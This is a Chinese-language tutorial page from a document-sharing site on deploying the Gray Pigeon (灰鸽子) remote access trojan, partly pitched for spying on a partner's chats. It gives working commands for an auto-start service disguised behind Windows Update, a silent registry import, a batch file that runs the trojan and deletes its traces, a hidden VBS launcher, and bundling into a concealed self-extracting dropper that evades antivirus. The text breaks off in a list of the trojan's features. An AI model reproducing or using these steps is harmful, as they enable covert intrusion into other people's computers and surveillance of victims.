如果您无法下载资料,请参考说明:
1、部分资料下载需要金币,请确保您的账户上有足够的金币
2、已购买过的文档,再次下载不重复扣费
3、资料包下载后请先用软件解压,在使用对应软件打开
黑客入侵:灰鸽子2011使用教程(图解)写在前面:现在灰鸽子是越来越困难了,查杀太严重,新手基本上很难捉到鸡,建议如果只是想监控男女朋友QQ聊天记录的新手,直接购买网络人远程控制软件软件,非常好用的一款监控软件,免杀做得很好,鸽子其实不是免费的,空间也是收费的。没必要浪费时间)灰鸽子教程准备工具:鸽子服务端IcoSprite图标更改器;SC.exe服务添加删除更改工具;winrar程序特点:自解压形式,双击即可制作过程:1.首先自己配置一下鸽子服务端,配置时[启动项设置]这里面的都不要填,不要写入注册表,也不要用服务启动。其他的随你个人爱好。2.用SC创建一个服务运行CMD.EXE在system32的目录下运行执行SC.execreatehuigeziBinPath="%systemroot%\system32\gezi.exe"type=owntype=interactstart=autoDisplayName="gezi"‘这句是用SC建立一个服务,服务名为huigezi,路径Binpath为"%systemroot%\system32\gezi.exe",类型type为own与interact交互,启动类型start为自动,显示名DisplayName为"gezi"。sc.exedescript_ionhuigezi"不死鸽子"‘这句是将huigezi服务的描述改为“不死鸽子”scconfigwuauservdepend=huigezi‘配置huigezi使wuauserv服务依存此服务(wuauserv可以根据自己喜欢改成其它服务,这里的wuauserv是系统在WindowsUpdate网站的自动更新服务)。这里的目的是迷惑管理员,使其不敢轻易停止我们生成的服务,自己也可以多加点。3.将这些从注册表导出,我个人经验是:瑞星,咔吧等的注册表监控不会对导入注册表报警.我们将他命名为1.reg4.创建一个BAT文件,并命名为update.bat@regedit/s%systemroot%\system32\1.reg@%systemroot%\system32\gezi.exe@del/q/f/s%systemroot%\system32\1.reg@del/q/f/s%systemroot%\system32\Update.vbs@del/q/f/s%systemroot%\system32\Update.bat5.创建一个vbs并命名为update.vbs目的是为了作用是令bat里的内容以安静模式执行,这样就可以让cmd窗口跳出来了,增加了不少隐蔽性。里面写上如下代码:OnErrorResumeNextsetwshshell=createobject("wscript_.shell")a=wshshell.run("cmd.exe/C%systemroot%\system32\Update.bat",0,TRUE)6.用我门配置出来的服务端,并命名为run.exe,用run.exe做一个自解压文件,并命名为gezi.exe.。记得将解压模式为全部隐藏.解压后运行run.exe,当然你的服务端要自己做免杀,这里我就不多说了。八仙过海....7.将gezi.exe1.regUpdate.vbsUpdate.bat再用winrar制作一个自解压文件,解压到%systemroot%\system32\解压后运行Update.vbs当然解压模式依旧全部隐藏,替换同名文件现在用rar捆绑出来的文件很多杀软都不杀,你也可以用系统自带的捆绑机,或其他的捆绑机这个方法可以用到其他的木马中捆出来的自解压文件也可以自己再加工:去掉右键用"winrar打开"灰鸽子第一章:软件相关介绍:灰鸽子[VIP专业版]1.只用一个端口来传输所有通讯数据!普通同类软件都用到了两个或两个以上的端口来完成!2.支持可以控制Internet连接共享、HTTP透明代理上网的电脑!软件智能读取系统设定的代理服务器信息,无需用户设置!3.无需知道服务端IP,自动上线功能让服务端自动上线报道!灰鸽子专用的上线系统无需您注册免费域名才能使用,同时也提供了备用上线方式,在我们的专用上线系统出现故障时,您可以使用备用上线方式来使用自动上线功能。在使用专用上线系统时,你还可以控制远程电脑通过Socks5代理来中转自动上线。4.自动上线可以在第一次设置分组,自定义上线图像,上线备注等,这样都可以让你轻而易举的找到目标主机,同时设置连接密码保证了服务主机的安全性!同时具用牵手版的搜索符合条件主机的功能:a